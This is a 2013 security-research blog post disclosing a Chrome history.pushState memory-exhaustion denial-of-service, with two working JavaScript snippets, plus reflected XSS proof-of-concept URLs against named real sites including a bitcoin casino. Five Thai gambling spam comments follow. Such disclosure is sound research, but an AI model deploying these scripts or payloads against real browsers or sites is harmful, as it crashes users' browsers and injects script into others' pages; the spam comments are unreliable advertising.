Monday, July 22, 2013

In the meantime...

Recently, when I have some spare time, I'm finishing my own project which I hope to release soon. However, apart from that project I have also found:

  • Google Chrome <= 28 DoS (by memory exhaustion) using history.pushState
    <script>
var r="BOMB!";for(var e=0;e<22;e++){r+=r;}
for(var d=0;d<100000;d++) {
        history.pushState({},r);
}
</script>
    Live demo

    On android 4.2.2 @ nexus 7 this is quicker: 
    <script>
var r="";for(var e=0;e<1000000;e++){r+=String.fromCharCode(1+Math.floor(Math.random()*254));}
history.pushState({},r,r);
</script>

  • pear.php.net XSS

    http://pear.php.net/support/lists.php (Email parameter was neither validated nor sanitized)

  • satoshiroulette.com (bitcoin casino) XSS :

    Examples:

    http://satoshiroulette.com/game-info.php?mode=BTC&game=%3C/title%3E%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E

    http://satoshiroulette.com/render_address_roulette.php?mode=BTC&game=%3Cbody%20onload=%22javascript:console.log%28%27XSS%27%29%22%20/%3E
Posted by at
Labels: , , ,

5 comments:

  1. newinMay 27, 2022 at 11:13 AM

    รีวิวเกมสล็อตอัพเดตล่าสุด Age of Huracan ชมชนเผ่ามายา อีกหนึ่งวิดีโอสล็อตที่ได้รับการยอมรับจากนักพนันมากมาย https://www.megaslot.game/ ที่มาพร้อมกับฟังก์ชั่นการทำเงินก้อนโต

    ReplyDelete
  2. PhuwadonJuly 12, 2022 at 9:34 AM

    Try Slots ทดลองเล่นสล็อต คลิกที่นี้ with the most popular PG faction. No.1 online slot machine website, easy to play, 100% real money, come play demo with us today. Win many prizes Ready to get free credits to play slots games with the team. Happy to give advice 24 hours a day, even on holidays, can come and play all day without getting bored.

    ReplyDelete
  3. slot pg 123December 12, 2023 at 8:16 AM

    slot pg 123 เกมของทางค่าย pg slot นี้เรียกว่าจัดหนักจัดเต็มกันทุกเกมที่ออกมาเลยเพราะเหตุว่ามีเกมให้เลือกเล่นมากมายมากยิ่งกว่า100รายการเกม ทำให้ผู้เล่นต่างชอบใจเกมของทาง pgslot

    ReplyDelete
  4. zeed slot168December 12, 2023 at 8:16 AM

    zeed slot168 ของพวกเรา วันนี้สามารถ ช่วยเพิ่มเดิมพันที่เหมาะสมที่สุด ให้กับนักร้องเพลงทุกคน pg slot สำหรับเพื่อการเลือกเข้าใช้บริการตรงนี้ กันแน่ๆ ค้ำประกันได้เลยว่าการสร้างรายได้

    ReplyDelete
  5. pg slot99thMarch 20, 2024 at 7:41 AM

    pg slot99th โบนัส แจกฟรี เป็นแพลตฟอร์มเกมสล็อตออนไลน์ที่ได้รับความนิยมในประเทศไทย โดยเน้นให้บริการเกม สล็อต ที่มีคุณภาพและหลากหลายตั้งแต่เกมสล็อตดั้งเดิมไปจนถึงเกมสล็อตที่เรียกว่าสุดล้ำ

    ReplyDelete

Subscribe to: Post Comments (Atom)